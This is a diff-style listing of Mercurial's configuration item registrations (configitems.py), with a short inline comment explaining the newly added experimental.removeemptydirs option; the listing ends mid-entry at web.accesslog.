272 coreconfigitem('convert', 'hg.usebranchnames',
272 coreconfigitem('convert', 'hg.usebranchnames',
273 default=True,
273 default=True,
274 )
274 )
275 coreconfigitem('convert', 'ignoreancestorcheck',
275 coreconfigitem('convert', 'ignoreancestorcheck',
276 default=False,
276 default=False,
277 )
277 )
278 coreconfigitem('convert', 'localtimezone',
278 coreconfigitem('convert', 'localtimezone',
279 default=False,
279 default=False,
280 )
280 )
281 coreconfigitem('convert', 'p4.encoding',
281 coreconfigitem('convert', 'p4.encoding',
282 default=dynamicdefault,
282 default=dynamicdefault,
283 )
283 )
284 coreconfigitem('convert', 'p4.startrev',
284 coreconfigitem('convert', 'p4.startrev',
285 default=0,
285 default=0,
286 )
286 )
287 coreconfigitem('convert', 'skiptags',
287 coreconfigitem('convert', 'skiptags',
288 default=False,
288 default=False,
289 )
289 )
290 coreconfigitem('convert', 'svn.debugsvnlog',
290 coreconfigitem('convert', 'svn.debugsvnlog',
291 default=True,
291 default=True,
292 )
292 )
293 coreconfigitem('convert', 'svn.trunk',
293 coreconfigitem('convert', 'svn.trunk',
294 default=None,
294 default=None,
295 )
295 )
296 coreconfigitem('convert', 'svn.tags',
296 coreconfigitem('convert', 'svn.tags',
297 default=None,
297 default=None,
298 )
298 )
299 coreconfigitem('convert', 'svn.branches',
299 coreconfigitem('convert', 'svn.branches',
300 default=None,
300 default=None,
301 )
301 )
302 coreconfigitem('convert', 'svn.startrev',
302 coreconfigitem('convert', 'svn.startrev',
303 default=0,
303 default=0,
304 )
304 )
305 coreconfigitem('debug', 'dirstate.delaywrite',
305 coreconfigitem('debug', 'dirstate.delaywrite',
306 default=0,
306 default=0,
307 )
307 )
308 coreconfigitem('defaults', '.*',
308 coreconfigitem('defaults', '.*',
309 default=None,
309 default=None,
310 generic=True,
310 generic=True,
311 )
311 )
312 coreconfigitem('devel', 'all-warnings',
312 coreconfigitem('devel', 'all-warnings',
313 default=False,
313 default=False,
314 )
314 )
315 coreconfigitem('devel', 'bundle2.debug',
315 coreconfigitem('devel', 'bundle2.debug',
316 default=False,
316 default=False,
317 )
317 )
318 coreconfigitem('devel', 'cache-vfs',
318 coreconfigitem('devel', 'cache-vfs',
319 default=None,
319 default=None,
320 )
320 )
321 coreconfigitem('devel', 'check-locks',
321 coreconfigitem('devel', 'check-locks',
322 default=False,
322 default=False,
323 )
323 )
324 coreconfigitem('devel', 'check-relroot',
324 coreconfigitem('devel', 'check-relroot',
325 default=False,
325 default=False,
326 )
326 )
327 coreconfigitem('devel', 'default-date',
327 coreconfigitem('devel', 'default-date',
328 default=None,
328 default=None,
329 )
329 )
330 coreconfigitem('devel', 'deprec-warn',
330 coreconfigitem('devel', 'deprec-warn',
331 default=False,
331 default=False,
332 )
332 )
333 coreconfigitem('devel', 'disableloaddefaultcerts',
333 coreconfigitem('devel', 'disableloaddefaultcerts',
334 default=False,
334 default=False,
335 )
335 )
336 coreconfigitem('devel', 'warn-empty-changegroup',
336 coreconfigitem('devel', 'warn-empty-changegroup',
337 default=False,
337 default=False,
338 )
338 )
339 coreconfigitem('devel', 'legacy.exchange',
339 coreconfigitem('devel', 'legacy.exchange',
340 default=list,
340 default=list,
341 )
341 )
342 coreconfigitem('devel', 'servercafile',
342 coreconfigitem('devel', 'servercafile',
343 default='',
343 default='',
344 )
344 )
345 coreconfigitem('devel', 'serverexactprotocol',
345 coreconfigitem('devel', 'serverexactprotocol',
346 default='',
346 default='',
347 )
347 )
348 coreconfigitem('devel', 'serverrequirecert',
348 coreconfigitem('devel', 'serverrequirecert',
349 default=False,
349 default=False,
350 )
350 )
351 coreconfigitem('devel', 'strip-obsmarkers',
351 coreconfigitem('devel', 'strip-obsmarkers',
352 default=True,
352 default=True,
353 )
353 )
354 coreconfigitem('devel', 'warn-config',
354 coreconfigitem('devel', 'warn-config',
355 default=None,
355 default=None,
356 )
356 )
357 coreconfigitem('devel', 'warn-config-default',
357 coreconfigitem('devel', 'warn-config-default',
358 default=None,
358 default=None,
359 )
359 )
360 coreconfigitem('devel', 'user.obsmarker',
360 coreconfigitem('devel', 'user.obsmarker',
361 default=None,
361 default=None,
362 )
362 )
363 coreconfigitem('devel', 'warn-config-unknown',
363 coreconfigitem('devel', 'warn-config-unknown',
364 default=None,
364 default=None,
365 )
365 )
366 coreconfigitem('devel', 'debug.peer-request',
366 coreconfigitem('devel', 'debug.peer-request',
367 default=False,
367 default=False,
368 )
368 )
369 coreconfigitem('diff', 'nodates',
369 coreconfigitem('diff', 'nodates',
370 default=False,
370 default=False,
371 )
371 )
372 coreconfigitem('diff', 'showfunc',
372 coreconfigitem('diff', 'showfunc',
373 default=False,
373 default=False,
374 )
374 )
375 coreconfigitem('diff', 'unified',
375 coreconfigitem('diff', 'unified',
376 default=None,
376 default=None,
377 )
377 )
378 coreconfigitem('diff', 'git',
378 coreconfigitem('diff', 'git',
379 default=False,
379 default=False,
380 )
380 )
381 coreconfigitem('diff', 'ignorews',
381 coreconfigitem('diff', 'ignorews',
382 default=False,
382 default=False,
383 )
383 )
384 coreconfigitem('diff', 'ignorewsamount',
384 coreconfigitem('diff', 'ignorewsamount',
385 default=False,
385 default=False,
386 )
386 )
387 coreconfigitem('diff', 'ignoreblanklines',
387 coreconfigitem('diff', 'ignoreblanklines',
388 default=False,
388 default=False,
389 )
389 )
390 coreconfigitem('diff', 'ignorewseol',
390 coreconfigitem('diff', 'ignorewseol',
391 default=False,
391 default=False,
392 )
392 )
393 coreconfigitem('diff', 'nobinary',
393 coreconfigitem('diff', 'nobinary',
394 default=False,
394 default=False,
395 )
395 )
396 coreconfigitem('diff', 'noprefix',
396 coreconfigitem('diff', 'noprefix',
397 default=False,
397 default=False,
398 )
398 )
399 coreconfigitem('email', 'bcc',
399 coreconfigitem('email', 'bcc',
400 default=None,
400 default=None,
401 )
401 )
402 coreconfigitem('email', 'cc',
402 coreconfigitem('email', 'cc',
403 default=None,
403 default=None,
404 )
404 )
405 coreconfigitem('email', 'charsets',
405 coreconfigitem('email', 'charsets',
406 default=list,
406 default=list,
407 )
407 )
408 coreconfigitem('email', 'from',
408 coreconfigitem('email', 'from',
409 default=None,
409 default=None,
410 )
410 )
411 coreconfigitem('email', 'method',
411 coreconfigitem('email', 'method',
412 default='smtp',
412 default='smtp',
413 )
413 )
414 coreconfigitem('email', 'reply-to',
414 coreconfigitem('email', 'reply-to',
415 default=None,
415 default=None,
416 )
416 )
417 coreconfigitem('email', 'to',
417 coreconfigitem('email', 'to',
418 default=None,
418 default=None,
419 )
419 )
420 coreconfigitem('experimental', 'archivemetatemplate',
420 coreconfigitem('experimental', 'archivemetatemplate',
421 default=dynamicdefault,
421 default=dynamicdefault,
422 )
422 )
423 coreconfigitem('experimental', 'bundle-phases',
423 coreconfigitem('experimental', 'bundle-phases',
424 default=False,
424 default=False,
425 )
425 )
426 coreconfigitem('experimental', 'bundle2-advertise',
426 coreconfigitem('experimental', 'bundle2-advertise',
427 default=True,
427 default=True,
428 )
428 )
429 coreconfigitem('experimental', 'bundle2-output-capture',
429 coreconfigitem('experimental', 'bundle2-output-capture',
430 default=False,
430 default=False,
431 )
431 )
432 coreconfigitem('experimental', 'bundle2.pushback',
432 coreconfigitem('experimental', 'bundle2.pushback',
433 default=False,
433 default=False,
434 )
434 )
435 coreconfigitem('experimental', 'bundle2.stream',
435 coreconfigitem('experimental', 'bundle2.stream',
436 default=False,
436 default=False,
437 )
437 )
438 coreconfigitem('experimental', 'bundle2lazylocking',
438 coreconfigitem('experimental', 'bundle2lazylocking',
439 default=False,
439 default=False,
440 )
440 )
441 coreconfigitem('experimental', 'bundlecomplevel',
441 coreconfigitem('experimental', 'bundlecomplevel',
442 default=None,
442 default=None,
443 )
443 )
444 coreconfigitem('experimental', 'bundlecomplevel.bzip2',
444 coreconfigitem('experimental', 'bundlecomplevel.bzip2',
445 default=None,
445 default=None,
446 )
446 )
447 coreconfigitem('experimental', 'bundlecomplevel.gzip',
447 coreconfigitem('experimental', 'bundlecomplevel.gzip',
448 default=None,
448 default=None,
449 )
449 )
450 coreconfigitem('experimental', 'bundlecomplevel.none',
450 coreconfigitem('experimental', 'bundlecomplevel.none',
451 default=None,
451 default=None,
452 )
452 )
453 coreconfigitem('experimental', 'bundlecomplevel.zstd',
453 coreconfigitem('experimental', 'bundlecomplevel.zstd',
454 default=None,
454 default=None,
455 )
455 )
456 coreconfigitem('experimental', 'changegroup3',
456 coreconfigitem('experimental', 'changegroup3',
457 default=False,
457 default=False,
458 )
458 )
459 coreconfigitem('experimental', 'clientcompressionengines',
459 coreconfigitem('experimental', 'clientcompressionengines',
460 default=list,
460 default=list,
461 )
461 )
462 coreconfigitem('experimental', 'copytrace',
462 coreconfigitem('experimental', 'copytrace',
463 default='on',
463 default='on',
464 )
464 )
465 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
465 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
466 default=100,
466 default=100,
467 )
467 )
468 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
468 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
469 default=100,
469 default=100,
470 )
470 )
471 coreconfigitem('experimental', 'crecordtest',
471 coreconfigitem('experimental', 'crecordtest',
472 default=None,
472 default=None,
473 )
473 )
474 coreconfigitem('experimental', 'directaccess',
474 coreconfigitem('experimental', 'directaccess',
475 default=False,
475 default=False,
476 )
476 )
477 coreconfigitem('experimental', 'directaccess.revnums',
477 coreconfigitem('experimental', 'directaccess.revnums',
478 default=False,
478 default=False,
479 )
479 )
480 coreconfigitem('experimental', 'editortmpinhg',
480 coreconfigitem('experimental', 'editortmpinhg',
481 default=False,
481 default=False,
482 )
482 )
483 coreconfigitem('experimental', 'evolution',
483 coreconfigitem('experimental', 'evolution',
484 default=list,
484 default=list,
485 )
485 )
486 coreconfigitem('experimental', 'evolution.allowdivergence',
486 coreconfigitem('experimental', 'evolution.allowdivergence',
487 default=False,
487 default=False,
488 alias=[('experimental', 'allowdivergence')]
488 alias=[('experimental', 'allowdivergence')]
489 )
489 )
490 coreconfigitem('experimental', 'evolution.allowunstable',
490 coreconfigitem('experimental', 'evolution.allowunstable',
491 default=None,
491 default=None,
492 )
492 )
493 coreconfigitem('experimental', 'evolution.createmarkers',
493 coreconfigitem('experimental', 'evolution.createmarkers',
494 default=None,
494 default=None,
495 )
495 )
496 coreconfigitem('experimental', 'evolution.effect-flags',
496 coreconfigitem('experimental', 'evolution.effect-flags',
497 default=True,
497 default=True,
498 alias=[('experimental', 'effect-flags')]
498 alias=[('experimental', 'effect-flags')]
499 )
499 )
500 coreconfigitem('experimental', 'evolution.exchange',
500 coreconfigitem('experimental', 'evolution.exchange',
501 default=None,
501 default=None,
502 )
502 )
503 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
503 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
504 default=False,
504 default=False,
505 )
505 )
506 coreconfigitem('experimental', 'evolution.report-instabilities',
506 coreconfigitem('experimental', 'evolution.report-instabilities',
507 default=True,
507 default=True,
508 )
508 )
509 coreconfigitem('experimental', 'evolution.track-operation',
509 coreconfigitem('experimental', 'evolution.track-operation',
510 default=True,
510 default=True,
511 )
511 )
512 coreconfigitem('experimental', 'worddiff',
512 coreconfigitem('experimental', 'worddiff',
513 default=False,
513 default=False,
514 )
514 )
515 coreconfigitem('experimental', 'maxdeltachainspan',
515 coreconfigitem('experimental', 'maxdeltachainspan',
516 default=-1,
516 default=-1,
517 )
517 )
518 coreconfigitem('experimental', 'mergetempdirprefix',
518 coreconfigitem('experimental', 'mergetempdirprefix',
519 default=None,
519 default=None,
520 )
520 )
521 coreconfigitem('experimental', 'mmapindexthreshold',
521 coreconfigitem('experimental', 'mmapindexthreshold',
522 default=None,
522 default=None,
523 )
523 )
524 coreconfigitem('experimental', 'nonnormalparanoidcheck',
524 coreconfigitem('experimental', 'nonnormalparanoidcheck',
525 default=False,
525 default=False,
526 )
526 )
527 coreconfigitem('experimental', 'exportableenviron',
527 coreconfigitem('experimental', 'exportableenviron',
528 default=list,
528 default=list,
529 )
529 )
530 coreconfigitem('experimental', 'extendedheader.index',
530 coreconfigitem('experimental', 'extendedheader.index',
531 default=None,
531 default=None,
532 )
532 )
533 coreconfigitem('experimental', 'extendedheader.similarity',
533 coreconfigitem('experimental', 'extendedheader.similarity',
534 default=False,
534 default=False,
535 )
535 )
536 coreconfigitem('experimental', 'format.compression',
536 coreconfigitem('experimental', 'format.compression',
537 default='zlib',
537 default='zlib',
538 )
538 )
539 coreconfigitem('experimental', 'graphshorten',
539 coreconfigitem('experimental', 'graphshorten',
540 default=False,
540 default=False,
541 )
541 )
542 coreconfigitem('experimental', 'graphstyle.parent',
542 coreconfigitem('experimental', 'graphstyle.parent',
543 default=dynamicdefault,
543 default=dynamicdefault,
544 )
544 )
545 coreconfigitem('experimental', 'graphstyle.missing',
545 coreconfigitem('experimental', 'graphstyle.missing',
546 default=dynamicdefault,
546 default=dynamicdefault,
547 )
547 )
548 coreconfigitem('experimental', 'graphstyle.grandparent',
548 coreconfigitem('experimental', 'graphstyle.grandparent',
549 default=dynamicdefault,
549 default=dynamicdefault,
550 )
550 )
551 coreconfigitem('experimental', 'hook-track-tags',
551 coreconfigitem('experimental', 'hook-track-tags',
552 default=False,
552 default=False,
553 )
553 )
554 coreconfigitem('experimental', 'httppeer.advertise-v2',
554 coreconfigitem('experimental', 'httppeer.advertise-v2',
555 default=False,
555 default=False,
556 )
556 )
557 coreconfigitem('experimental', 'httppostargs',
557 coreconfigitem('experimental', 'httppostargs',
558 default=False,
558 default=False,
559 )
559 )
560 coreconfigitem('experimental', 'mergedriver',
560 coreconfigitem('experimental', 'mergedriver',
561 default=None,
561 default=None,
562 )
562 )
563 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
563 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
564 default=False,
564 default=False,
565 )
565 )
566 coreconfigitem('experimental', 'remotenames',
566 coreconfigitem('experimental', 'remotenames',
567 default=False,
567 default=False,
568 )
568 )
569 coreconfigitem('experimental', 'removeemptydirs',
570 default=True,
571 )
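
The experimental.removeemptydirs item registered just above is the new knob introduced by this change; it reads like any other boolean config item. A minimal sketch of a call site, assuming a ui instance is in scope:

    # True by default per the registration above; users can opt out with
    # --config experimental.removeemptydirs=0
    removeemptydirs = ui.configbool('experimental', 'removeemptydirs')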
572 coreconfigitem('experimental', 'revlogv2',
573 default=None,
574 )
575 coreconfigitem('experimental', 'single-head-per-branch',
576 default=False,
577 )
578 coreconfigitem('experimental', 'sshserver.support-v2',
579 default=False,
580 )
581 coreconfigitem('experimental', 'spacemovesdown',
582 default=False,
583 )
584 coreconfigitem('experimental', 'sparse-read',
585 default=False,
586 )
587 coreconfigitem('experimental', 'sparse-read.density-threshold',
588 default=0.25,
589 )
590 coreconfigitem('experimental', 'sparse-read.min-gap-size',
591 default='256K',
592 )
593 coreconfigitem('experimental', 'treemanifest',
594 default=False,
595 )
596 coreconfigitem('experimental', 'update.atomic-file',
597 default=False,
598 )
599 coreconfigitem('experimental', 'sshpeer.advertise-v2',
600 default=False,
601 )
602 coreconfigitem('experimental', 'web.apiserver',
603 default=False,
604 )
605 coreconfigitem('experimental', 'web.api.http-v2',
606 default=False,
607 )
608 coreconfigitem('experimental', 'web.api.debugreflect',
609 default=False,
610 )
611 coreconfigitem('experimental', 'xdiff',
612 default=False,
613 )
614 coreconfigitem('extensions', '.*',
615 default=None,
616 generic=True,
617 )
618 coreconfigitem('extdata', '.*',
619 default=None,
620 generic=True,
621 )
622 coreconfigitem('format', 'aggressivemergedeltas',
623 default=False,
624 )
625 coreconfigitem('format', 'chunkcachesize',
626 default=None,
627 )
628 coreconfigitem('format', 'dotencode',
629 default=True,
630 )
631 coreconfigitem('format', 'generaldelta',
632 default=False,
633 )
634 coreconfigitem('format', 'manifestcachesize',
635 default=None,
636 )
637 coreconfigitem('format', 'maxchainlen',
638 default=None,
639 )
640 coreconfigitem('format', 'obsstore-version',
641 default=None,
642 )
643 coreconfigitem('format', 'usefncache',
644 default=True,
645 )
646 coreconfigitem('format', 'usegeneraldelta',
647 default=True,
648 )
649 coreconfigitem('format', 'usestore',
650 default=True,
651 )
652 coreconfigitem('fsmonitor', 'warn_when_unused',
653 default=True,
654 )
655 coreconfigitem('fsmonitor', 'warn_update_file_count',
656 default=50000,
657 )
658 coreconfigitem('hooks', '.*',
659 default=dynamicdefault,
660 generic=True,
661 )
662 coreconfigitem('hgweb-paths', '.*',
663 default=list,
664 generic=True,
665 )
666 coreconfigitem('hostfingerprints', '.*',
667 default=list,
668 generic=True,
669 )
670 coreconfigitem('hostsecurity', 'ciphers',
671 default=None,
672 )
673 coreconfigitem('hostsecurity', 'disabletls10warning',
674 default=False,
675 )
676 coreconfigitem('hostsecurity', 'minimumprotocol',
677 default=dynamicdefault,
678 )
679 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
680 default=dynamicdefault,
681 generic=True,
682 )
683 coreconfigitem('hostsecurity', '.*:ciphers$',
684 default=dynamicdefault,
685 generic=True,
686 )
687 coreconfigitem('hostsecurity', '.*:fingerprints$',
688 default=list,
689 generic=True,
690 )
691 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
692 default=None,
693 generic=True,
694 )
695
696 coreconfigitem('http_proxy', 'always',
697 default=False,
698 )
699 coreconfigitem('http_proxy', 'host',
700 default=None,
701 )
702 coreconfigitem('http_proxy', 'no',
703 default=list,
704 )
705 coreconfigitem('http_proxy', 'passwd',
706 default=None,
707 )
708 coreconfigitem('http_proxy', 'user',
709 default=None,
710 )
711 coreconfigitem('logtoprocess', 'commandexception',
712 default=None,
713 )
714 coreconfigitem('logtoprocess', 'commandfinish',
715 default=None,
716 )
717 coreconfigitem('logtoprocess', 'command',
718 default=None,
719 )
720 coreconfigitem('logtoprocess', 'develwarn',
721 default=None,
722 )
723 coreconfigitem('logtoprocess', 'uiblocked',
724 default=None,
725 )
726 coreconfigitem('merge', 'checkunknown',
727 default='abort',
728 )
729 coreconfigitem('merge', 'checkignored',
730 default='abort',
731 )
732 coreconfigitem('experimental', 'merge.checkpathconflicts',
733 default=False,
734 )
735 coreconfigitem('merge', 'followcopies',
736 default=True,
737 )
738 coreconfigitem('merge', 'on-failure',
739 default='continue',
740 )
741 coreconfigitem('merge', 'preferancestor',
742 default=lambda: ['*'],
743 )
744 coreconfigitem('merge-tools', '.*',
745 default=None,
746 generic=True,
747 )
748 coreconfigitem('merge-tools', br'.*\.args$',
749 default="$local $base $other",
750 generic=True,
751 priority=-1,
752 )
753 coreconfigitem('merge-tools', br'.*\.binary$',
754 default=False,
755 generic=True,
756 priority=-1,
757 )
758 coreconfigitem('merge-tools', br'.*\.check$',
759 default=list,
760 generic=True,
761 priority=-1,
762 )
763 coreconfigitem('merge-tools', br'.*\.checkchanged$',
764 default=False,
765 generic=True,
766 priority=-1,
767 )
768 coreconfigitem('merge-tools', br'.*\.executable$',
769 default=dynamicdefault,
770 generic=True,
771 priority=-1,
772 )
773 coreconfigitem('merge-tools', br'.*\.fixeol$',
774 default=False,
775 generic=True,
776 priority=-1,
777 )
778 coreconfigitem('merge-tools', br'.*\.gui$',
779 default=False,
780 generic=True,
781 priority=-1,
782 )
783 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
784 default='basic',
785 generic=True,
786 priority=-1,
787 )
788 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
789 default=dynamicdefault, # take from ui.mergemarkertemplate
790 generic=True,
791 priority=-1,
792 )
793 coreconfigitem('merge-tools', br'.*\.priority$',
794 default=0,
795 generic=True,
796 priority=-1,
797 )
798 coreconfigitem('merge-tools', br'.*\.premerge$',
799 default=dynamicdefault,
800 generic=True,
801 priority=-1,
802 )
803 coreconfigitem('merge-tools', br'.*\.symlink$',
804 default=False,
805 generic=True,
806 priority=-1,
807 )
808 coreconfigitem('pager', 'attend-.*',
809 default=dynamicdefault,
810 generic=True,
811 )
812 coreconfigitem('pager', 'ignore',
813 default=list,
814 )
815 coreconfigitem('pager', 'pager',
816 default=dynamicdefault,
817 )
818 coreconfigitem('patch', 'eol',
819 default='strict',
820 )
821 coreconfigitem('patch', 'fuzz',
822 default=2,
823 )
824 coreconfigitem('paths', 'default',
825 default=None,
826 )
827 coreconfigitem('paths', 'default-push',
828 default=None,
829 )
830 coreconfigitem('paths', '.*',
831 default=None,
832 generic=True,
833 )
834 coreconfigitem('phases', 'checksubrepos',
835 default='follow',
836 )
837 coreconfigitem('phases', 'new-commit',
838 default='draft',
839 )
840 coreconfigitem('phases', 'publish',
841 default=True,
842 )
843 coreconfigitem('profiling', 'enabled',
844 default=False,
845 )
846 coreconfigitem('profiling', 'format',
847 default='text',
848 )
849 coreconfigitem('profiling', 'freq',
850 default=1000,
851 )
852 coreconfigitem('profiling', 'limit',
853 default=30,
854 )
855 coreconfigitem('profiling', 'nested',
856 default=0,
857 )
858 coreconfigitem('profiling', 'output',
859 default=None,
860 )
861 coreconfigitem('profiling', 'showmax',
862 default=0.999,
863 )
864 coreconfigitem('profiling', 'showmin',
865 default=dynamicdefault,
866 )
867 coreconfigitem('profiling', 'sort',
868 default='inlinetime',
869 )
870 coreconfigitem('profiling', 'statformat',
871 default='hotpath',
872 )
873 coreconfigitem('profiling', 'time-track',
874 default='cpu',
875 )
876 coreconfigitem('profiling', 'type',
877 default='stat',
878 )
879 coreconfigitem('progress', 'assume-tty',
880 default=False,
881 )
882 coreconfigitem('progress', 'changedelay',
883 default=1,
884 )
885 coreconfigitem('progress', 'clear-complete',
886 default=True,
887 )
888 coreconfigitem('progress', 'debug',
889 default=False,
890 )
891 coreconfigitem('progress', 'delay',
892 default=3,
893 )
894 coreconfigitem('progress', 'disable',
895 default=False,
896 )
897 coreconfigitem('progress', 'estimateinterval',
898 default=60.0,
899 )
900 coreconfigitem('progress', 'format',
901 default=lambda: ['topic', 'bar', 'number', 'estimate'],
902 )
903 coreconfigitem('progress', 'refresh',
904 default=0.1,
905 )
906 coreconfigitem('progress', 'width',
907 default=dynamicdefault,
908 )
909 coreconfigitem('push', 'pushvars.server',
910 default=False,
911 )
912 coreconfigitem('server', 'bookmarks-pushkey-compat',
913 default=True,
914 )
915 coreconfigitem('server', 'bundle1',
916 default=True,
917 )
918 coreconfigitem('server', 'bundle1gd',
919 default=None,
920 )
921 coreconfigitem('server', 'bundle1.pull',
922 default=None,
923 )
924 coreconfigitem('server', 'bundle1gd.pull',
925 default=None,
926 )
927 coreconfigitem('server', 'bundle1.push',
928 default=None,
929 )
930 coreconfigitem('server', 'bundle1gd.push',
931 default=None,
932 )
933 coreconfigitem('server', 'compressionengines',
934 default=list,
935 )
936 coreconfigitem('server', 'concurrent-push-mode',
937 default='strict',
938 )
939 coreconfigitem('server', 'disablefullbundle',
940 default=False,
941 )
942 coreconfigitem('server', 'maxhttpheaderlen',
943 default=1024,
944 )
945 coreconfigitem('server', 'pullbundle',
946 default=False,
947 )
948 coreconfigitem('server', 'preferuncompressed',
949 default=False,
950 )
951 coreconfigitem('server', 'streamunbundle',
952 default=False,
953 )
954 coreconfigitem('server', 'uncompressed',
955 default=True,
956 )
957 coreconfigitem('server', 'uncompressedallowsecret',
958 default=False,
959 )
960 coreconfigitem('server', 'validate',
961 default=False,
962 )
963 coreconfigitem('server', 'zliblevel',
964 default=-1,
965 )
966 coreconfigitem('server', 'zstdlevel',
967 default=3,
968 )
969 coreconfigitem('share', 'pool',
970 default=None,
971 )
972 coreconfigitem('share', 'poolnaming',
973 default='identity',
974 )
975 coreconfigitem('smtp', 'host',
976 default=None,
977 )
978 coreconfigitem('smtp', 'local_hostname',
979 default=None,
980 )
981 coreconfigitem('smtp', 'password',
982 default=None,
983 )
984 coreconfigitem('smtp', 'port',
985 default=dynamicdefault,
986 )
987 coreconfigitem('smtp', 'tls',
988 default='none',
989 )
990 coreconfigitem('smtp', 'username',
991 default=None,
992 )
993 coreconfigitem('sparse', 'missingwarning',
994 default=True,
995 )
996 coreconfigitem('subrepos', 'allowed',
997 default=dynamicdefault, # to make backporting simpler
998 )
999 coreconfigitem('subrepos', 'hg:allowed',
1000 default=dynamicdefault,
1001 )
1002 coreconfigitem('subrepos', 'git:allowed',
1003 default=dynamicdefault,
1004 )
1005 coreconfigitem('subrepos', 'svn:allowed',
1006 default=dynamicdefault,
1007 )
1008 coreconfigitem('templates', '.*',
1009 default=None,
1010 generic=True,
1011 )
1012 coreconfigitem('trusted', 'groups',
1013 default=list,
1014 )
1015 coreconfigitem('trusted', 'users',
1016 default=list,
1017 )
1018 coreconfigitem('ui', '_usedassubrepo',
1019 default=False,
1020 )
1021 coreconfigitem('ui', 'allowemptycommit',
1022 default=False,
1023 )
1024 coreconfigitem('ui', 'archivemeta',
1025 default=True,
1026 )
1027 coreconfigitem('ui', 'askusername',
1028 default=False,
1029 )
1030 coreconfigitem('ui', 'clonebundlefallback',
1031 default=False,
1032 )
1033 coreconfigitem('ui', 'clonebundleprefers',
1034 default=list,
1035 )
1036 coreconfigitem('ui', 'clonebundles',
1037 default=True,
1038 )
1039 coreconfigitem('ui', 'color',
1040 default='auto',
1041 )
1042 coreconfigitem('ui', 'commitsubrepos',
1043 default=False,
1044 )
1045 coreconfigitem('ui', 'debug',
1046 default=False,
1047 )
1048 coreconfigitem('ui', 'debugger',
1049 default=None,
1050 )
1051 coreconfigitem('ui', 'editor',
1052 default=dynamicdefault,
1053 )
1054 coreconfigitem('ui', 'fallbackencoding',
1055 default=None,
1056 )
1057 coreconfigitem('ui', 'forcecwd',
1058 default=None,
1059 )
1060 coreconfigitem('ui', 'forcemerge',
1061 default=None,
1062 )
1063 coreconfigitem('ui', 'formatdebug',
1064 default=False,
1065 )
1066 coreconfigitem('ui', 'formatjson',
1067 default=False,
1068 )
1069 coreconfigitem('ui', 'formatted',
1070 default=None,
1071 )
1072 coreconfigitem('ui', 'graphnodetemplate',
1073 default=None,
1074 )
1075 coreconfigitem('ui', 'interactive',
1076 default=None,
1077 )
1078 coreconfigitem('ui', 'interface',
1079 default=None,
1080 )
1081 coreconfigitem('ui', 'interface.chunkselector',
1082 default=None,
1083 )
1084 coreconfigitem('ui', 'logblockedtimes',
1085 default=False,
1086 )
1087 coreconfigitem('ui', 'logtemplate',
1088 default=None,
1089 )
1090 coreconfigitem('ui', 'merge',
1091 default=None,
1092 )
1093 coreconfigitem('ui', 'mergemarkers',
1094 default='basic',
1095 )
1096 coreconfigitem('ui', 'mergemarkertemplate',
1097 default=('{node|short} '
1098 '{ifeq(tags, "tip", "", '
1099 'ifeq(tags, "", "", "{tags} "))}'
1100 '{if(bookmarks, "{bookmarks} ")}'
1101 '{ifeq(branch, "default", "", "{branch} ")}'
1102 '- {author|user}: {desc|firstline}')
1103 )
1104 coreconfigitem('ui', 'nontty',
1105 default=False,
1106 )
1107 coreconfigitem('ui', 'origbackuppath',
1108 default=None,
1109 )
1110 coreconfigitem('ui', 'paginate',
1111 default=True,
1112 )
1113 coreconfigitem('ui', 'patch',
1114 default=None,
1115 )
1116 coreconfigitem('ui', 'portablefilenames',
1117 default='warn',
1118 )
1119 coreconfigitem('ui', 'promptecho',
1120 default=False,
1121 )
1122 coreconfigitem('ui', 'quiet',
1123 default=False,
1124 )
1125 coreconfigitem('ui', 'quietbookmarkmove',
1126 default=False,
1127 )
1128 coreconfigitem('ui', 'remotecmd',
1129 default='hg',
1130 )
1131 coreconfigitem('ui', 'report_untrusted',
1132 default=True,
1133 )
1134 coreconfigitem('ui', 'rollback',
1135 default=True,
1136 )
1137 coreconfigitem('ui', 'signal-safe-lock',
1138 default=True,
1139 )
1140 coreconfigitem('ui', 'slash',
1141 default=False,
1142 )
1143 coreconfigitem('ui', 'ssh',
1144 default='ssh',
1145 )
1146 coreconfigitem('ui', 'ssherrorhint',
1147 default=None,
1148 )
1149 coreconfigitem('ui', 'statuscopies',
1150 default=False,
1151 )
1152 coreconfigitem('ui', 'strict',
1153 default=False,
1154 )
1155 coreconfigitem('ui', 'style',
1156 default='',
1157 )
1158 coreconfigitem('ui', 'supportcontact',
1159 default=None,
1160 )
1161 coreconfigitem('ui', 'textwidth',
1162 default=78,
1163 )
1164 coreconfigitem('ui', 'timeout',
1165 default='600',
1166 )
1167 coreconfigitem('ui', 'timeout.warn',
1168 default=0,
1169 )
1170 coreconfigitem('ui', 'traceback',
1171 default=False,
1172 )
1173 coreconfigitem('ui', 'tweakdefaults',
1174 default=False,
1175 )
1176 coreconfigitem('ui', 'username',
1177 alias=[('ui', 'user')]
1178 )
1179 coreconfigitem('ui', 'verbose',
1180 default=False,
1181 )
1182 coreconfigitem('verify', 'skipflags',
1183 default=None,
1184 )
1185 coreconfigitem('web', 'allowbz2',
1186 default=False,
1187 )
1188 coreconfigitem('web', 'allowgz',
1189 default=False,
1190 )
1191 coreconfigitem('web', 'allow-pull',
1192 alias=[('web', 'allowpull')],
1193 default=True,
1194 )
1195 coreconfigitem('web', 'allow-push',
1196 alias=[('web', 'allow_push')],
1197 default=list,
1198 )
1199 coreconfigitem('web', 'allowzip',
1200 default=False,
1201 )
1202 coreconfigitem('web', 'archivesubrepos',
1203 default=False,
1204 )
1205 coreconfigitem('web', 'cache',
1206 default=True,
1207 )
1208 coreconfigitem('web', 'contact',
1209 default=None,
1210 )
1211 coreconfigitem('web', 'deny_push',
1212 default=list,
1213 )
1214 coreconfigitem('web', 'guessmime',
1215 default=False,
1216 )
1217 coreconfigitem('web', 'hidden',
1218 default=False,
1219 )
1220 coreconfigitem('web', 'labels',
1221 default=list,
1222 )
1223 coreconfigitem('web', 'logoimg',
1224 default='hglogo.png',
1225 )
1226 coreconfigitem('web', 'logourl',
1227 default='https://mercurial-scm.org/',
1228 )
1229 coreconfigitem('web', 'accesslog',
